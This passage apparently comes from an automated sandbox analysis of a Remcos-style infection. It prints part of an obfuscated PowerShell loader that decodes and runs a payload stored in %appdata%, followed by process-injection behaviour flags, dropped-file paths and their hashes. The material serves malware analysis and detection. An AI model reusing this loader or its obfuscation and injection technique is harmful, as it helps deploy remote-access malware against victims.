mptkapni-StoreP Rusta ndertU finhStats Anst$Po tmV.lokkiKlubboDakotlLsladeR dent RevetInfrie R tzsChair)Ripsa ') ;Lestobiotic (Vidvinkelkameraet 'Sovse$ Re.pgVat alSelvhoPrecob d.traIns rlCryoh:kreatJ ConcuOp,tad Tan,oYoghokHaemaa Shik=Arc e$AdamagN netlHal,moPolygbBinzuaEvisll.eage:Kool,dRseneaBif gmDocernF,nyaaAk.umtSakkaoPlumrrInspayUss l+Sekve+ yps%Fatal$.angomS udka Kla s BenzhMy opiBlattn romeeRe ursAmb lsDispa.QuickcAlb.mo nomouLi,jenFart,tBrn p ') ;$Overthrows=$mashiness[$Judoka];}$Tegningers=300517;$Medial=30436;Lestobiotic (Vidvinkelkameraet 'Fo en$IdentgHovedlFalteoHrkrmbTandraBrabbl Oxys:FistiD Kra eDisq n enomuChicknL.ggicSericiMa neaFredetCouraiB ttevGradue Lovf2Maim.1Sol,e8 Supe Unde=Fo,ko NoncoGFort.e RapstArthr-Ba.dpCzacatoAarrinIntertEmisseScribnB.sant,veru Besou$Pro,uVSt.ntiStdt o Tal lSkorzeWhoret.ncoltAntineKr.vos etud ');Lestobiotic (Vidvinkelkameraet ' Fa.t$ P etgBreddlDomfloSla sbDustiaPa kelRialt:FrinuHSjlehe Tv vlAus ul TjeneAn inbstum aFremhrkransdFy tjiWeekesIgnistFrdseeArd ar toze Conce=,oass ,ncon[F ftyS Stokyautoss TaxitRatioeMatrim,olum.AarsdCHarleoSp nsnUnsurvUnreveEun.krUafhntPrefi]Triqu:Bndse:SectiFTipolrKampio Sonam depaBKatteaSteresBundfeKylli6Decer4UdeluSPre at ,kunrTag,eiAnomonPulicgImp t(Pa,jf$ TillDThermeCowb.nDe inuSputanqueercma emiSona aBjlentClutti ,saavBondeePulpa2 End 1Godke8Du er) salo ');Lestobiotic (Vidvinkelkameraet 'Sparr$ UnfogBypaslAguilo B ndb GustaAdvoklpalae:HovedDFlgbrrSinewg Refee formnSelade Lichs Odo, Iodop=Jekat Stokk[ArbejSNo.rayAdjacs Tar tParteeRel smUnexp.HaphtTForske emi,x FordtNep,r. Far.EIndsnnP dgic ServoUnwi.dGangsiHarnin lodagValdh] visu:Til,l:DobbeA ymphS P,ltC FyrsILirekI ,asi.DekanGFragteSigmatPaintS Wed tSkuesrKongsiProcrnPommegRea,p(Forst$ TidsHSkulkeS redlSarcolEducaeDisembSpartatiggerBevindOsciliTrolds,ejrstBaldeeStatsrBnder)Wirep ');Lestobiotic (Vidvinkelkameraet 'Athwa$Out hg SerblBasiloLandfbslikaaComfol yphe:FusenBSlje e fugnk MandeSolvrnStraad UnhatauburhSu.fueMemord Cent9 ind5Dkrl.=El te$IconoD TranrTo grgSalige FopdnnabobeAutovsBorde. Phans.iggeuva albFinensMusvitFe rarIndvai BortnStyreg Un t(Diarr$AftviTobrazeargoagLinjenR adfiFjer nBo tegStatsemisaprDgnbosLeat.,Scath$OsphrMPaakleGoldtdFre diThyroaNigrelContr)Mud e ');Lestobiotic $Bekendthed95;"
            4⤵
            • Network Service Discovery
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: CmdExeWriteProcessMemorySpam
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1896
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Frauke.Sik && echo t"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:664
            • C:\Program Files (x86)\windows mail\wabmig.exe
              "C:\Program Files (x86)\windows mail\wabmig.exe"
              5⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious use of SetWindowsHookEx
              PID:1708

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\ProgramData\remcos\logs.dat
      Filesize

      144B

      MD5

      ab769e9bfc88097c581367f746770a1e

      SHA1

      25275b4e4924e1f7e51d8b0f3bf02b1e50102520

      SHA256

      a63b701df95a967ece97cd5ff8c061adf0a97e541b528d1a92c78574737ddffe

      SHA512

      129292b0fb1992b9a0c4b91581e68523d3e713a51fea4dfedaf3f17b95ac88bee22d378211eb7fe5a30475f42dbd5762710ca94f37cd1de769a204aa77604715

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      342B

      MD5

      e3821a5d2bd8386d94fd05c38836fcba

      SHA1

      d2e83d26d3f5ef495d5f8d95c130ca2a48695800

      SHA256

      13dcad8d05876837927a7d59c61bf93d655193f18ebfe7c904199568d57bb14a

      SHA512

      b6f3fb9581b4f64b13e04bd0df5d71a815c9027b03a1aecff38da302cecdad439057178b344a94fd8ac988e425963373dd22944b58bbb30f6e6c3bf5ea1f7d34

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\CabC18D.tmp
      Filesize

      70KB

      MD5

      49aebf8cbd62d92ac215b2923fb1b9f5

      SHA1

      1723be06719828dda65ad804298d0431f6aff976

      SHA256

      b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

      SHA512

      bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\Tar5CC1.tmp
      Filesize

      181KB

      MD5

      4ea6026cf93ec6338144661bf1202cd1

      SHA1

      a1dec9044f750ad887935a01430bf49322fbdcb7

      SHA256

      8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

      SHA512

      6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Frauke.Sik
      Filesize

      430KB

      MD5

      340b7035f03c7f21d32ff6399ca95468

      SHA1

      75f997ca6d1ebe069dd6c072aad8396c8b4cbd6f

      SHA256

      60e8f01cf7048089ceaa756fd0569338edf71b36c3fe7f92eeacf9e0637f29d6

      SHA512

      594c3f149953169383c14de8c74cfd755717130f600137a0d1787faa3a0229799c7f5f1dd507ee411dc8dc9b98069ca22ec4c135065a38f8daf7b673826ed42f

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6FPFNNC6EKCE6WD7M50L.temp
      Filesize

      7KB

      MD5

      6a5ac30b62703cbf70b0ab180682c696

      SHA1

      44ef9698877778756cbbcc1a9e46914d3381a9ff

      SHA256

      8fb84a525719539b9299625a22de5e58c58853340635f2c662e4265796b5bf21

      SHA512

      b15c6e781280dcc3a7329f014908959edf55fe035d5c6445b469ec8f8f10061300addb0dcddb46e7fdb19525ff77a35f91f0699ce257d88bc97e1d682b4a154b

      Download Submit

    • memory/1708-63-0x00000000012C0000-0x00000000054FD000-memory.dmp

      Filesize

      66.2MB

      Download

    • memory/1708-61-0x0000000000250000-0x00000000012B2000-memory.dmp

      Filesize

      16.4MB

      Download

    • memory/1708-37-0x00000000012C0000-0x00000000054FD000-memory.dmp

      Filesize

      66.2MB

      Download

    • memory/1896-36-0x00000000066F0000-0x000000000A92D000-memory.dmp

      Filesize

      66.2MB

      Download

    • memory/2684-25-0x000007FEF6080000-0x000007FEF6A1D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2684-31-0x000007FEF6080000-0x000007FEF6A1D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2684-30-0x000007FEF6080000-0x000007FEF6A1D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2684-28-0x000007FEF633E000-0x000007FEF633F000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2684-27-0x000007FEF6080000-0x000007FEF6A1D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2684-26-0x000007FEF6080000-0x000007FEF6A1D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2684-24-0x000007FEF6080000-0x000007FEF6A1D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2684-23-0x000007FEF6080000-0x000007FEF6A1D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2684-22-0x0000000002240000-0x0000000002248000-memory.dmp

      Filesize

      32KB

      Download

    • memory/2684-21-0x000000001B680000-0x000000001B962000-memory.dmp

      Filesize

      2.9MB

      Download

    • memory/2684-64-0x000007FEF6080000-0x000007FEF6A1D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2684-20-0x000007FEF633E000-0x000007FEF633F000-memory.dmp

      Filesize

      4KB

      Download